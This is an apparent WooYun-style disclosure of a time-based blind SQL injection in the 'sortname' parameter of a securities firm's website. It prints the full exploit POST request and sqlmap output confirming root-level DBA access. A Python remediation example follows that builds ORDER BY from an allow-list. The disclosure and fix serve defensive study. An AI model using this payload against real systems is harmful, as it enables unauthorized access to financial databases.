
Huajin Securities main site SQL injection vulnerability (DBA privileges / time-based blind, root privileges)

2015-11-07 02:40

URL: http://**.**.**.**/

Injection test:

Code:
POST /creditTrans/searchList HTTP/1.1
Content-Length: 179
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: PHPSESSID=kdmgr839vmd0vh8u6ajkj9c4s2
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

module=2&page=1&rp=10&sortname=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&sortorder=desc&type=1



Injection confirmed:

[screenshot: 131.png]

Proof of vulnerability:

[screenshot: jinhua.png]



Privileges:

Code:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #2* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: module=2&page=1&rp=10&sortname=(select(0)from(select(sleep(0)))v)/'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+" AND (SELECT * FROM (SELECT(SLEEP(5)))Jksr)-- xRQj/&sortorder=desc&type=1
---
[13:07:49] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.12
[13:07:49] [INFO] testing if current user is DBA
[13:07:49] [INFO] fetching current user
[13:08:11] [INFO] adjusting time delay to 1 second due to good response times
root@localhost
current user is DBA: True

Fix:

Time-based blind injection, so I am not going to dump anything; it takes too long.
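The injectable parameter above is sortname, which the application evidently splices straight into an ORDER BY clause. Column names cannot be passed as bound parameters, so the standard fix is an allow-list that maps client-supplied sort names and directions onto fixed identifiers and rejects everything else. The following is an added example written for this page, not the site's own PHP code: it is in Python with an in-memory SQLite table whose name and columns are constructed assumptions, and it reuses the sortname payload from the request above only to show that the allow-listed builder refuses it while the concatenating builder embeds it verbatim.

```python
import sqlite3

# Allow-list: the only sort keys the client may name, mapped to real column
# identifiers. The table and column names are constructed assumptions; the
# original schema is not on the page.
SORTABLE_COLUMNS = {
    "id": "id",
    "amount": "amount",
    "created": "created_at",
}
SORT_ORDERS = {"asc": "ASC", "desc": "DESC"}

# The sortname value from the request on this page, URL-decoded.
PAGE_PAYLOAD = (
    "(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'\""
    "+(select(0)from(select(sleep(0)))v)+\"*/"
)


def build_query_unsafe(sortname, sortorder):
    """Vulnerable pattern: sort column and direction concatenated into the SQL text.
    ORDER BY cannot take a bound parameter, so prepared statements alone do not help."""
    return ("SELECT id, amount, created_at FROM credit_trans ORDER BY "
            + sortname + " " + sortorder)


def build_query_safe(sortname, sortorder):
    """Hardened pattern: client input is only ever used as a dictionary key.
    Anything that is not a known key is rejected before any SQL is built."""
    try:
        column = SORTABLE_COLUMNS[sortname]
        direction = SORT_ORDERS[sortorder.lower()]
    except (KeyError, AttributeError):
        raise ValueError("unsupported sort parameter")
    return "SELECT id, amount, created_at FROM credit_trans ORDER BY %s %s" % (column, direction)


def make_db():
    """Constructed sample data standing in for the site's credit-transfer listing."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE credit_trans (id INTEGER, amount REAL, created_at TEXT)")
    conn.executemany("INSERT INTO credit_trans VALUES (?, ?, ?)", [
        (1, 500.0, "2015-11-01"),
        (2, 1250.0, "2015-11-03"),
        (3, 80.0, "2015-11-05"),
    ])
    return conn


def search_list(conn, sortname, sortorder, page=1, rp=10):
    """Paged listing: page and rp are cast to int and bound as parameters,
    never concatenated; the ORDER BY comes from the allow-list."""
    sql = build_query_safe(sortname, sortorder) + " LIMIT ? OFFSET ?"
    return conn.execute(sql, (int(rp), (int(page) - 1) * int(rp))).fetchall()


def rejects(sortname, sortorder):
    """True if the hardened builder refuses this pair of sort parameters."""
    try:
        build_query_safe(sortname, sortorder)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(search_list(db, "amount", "desc"))
    print("unsafe builder embeds payload:", "sleep(0)" in build_query_unsafe(PAGE_PAYLOAD, "desc"))
    print("safe builder rejects payload:", rejects(PAGE_PAYLOAD, "desc"))
```

Returning a 400-style error for any sortname outside the map (rather than silently defaulting) also makes the probing traffic easy to spot in logs, since a legitimate client never sends anything but the few known keys.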


Source: www.wooyun.org/bugs/wooyun-2015-0141938
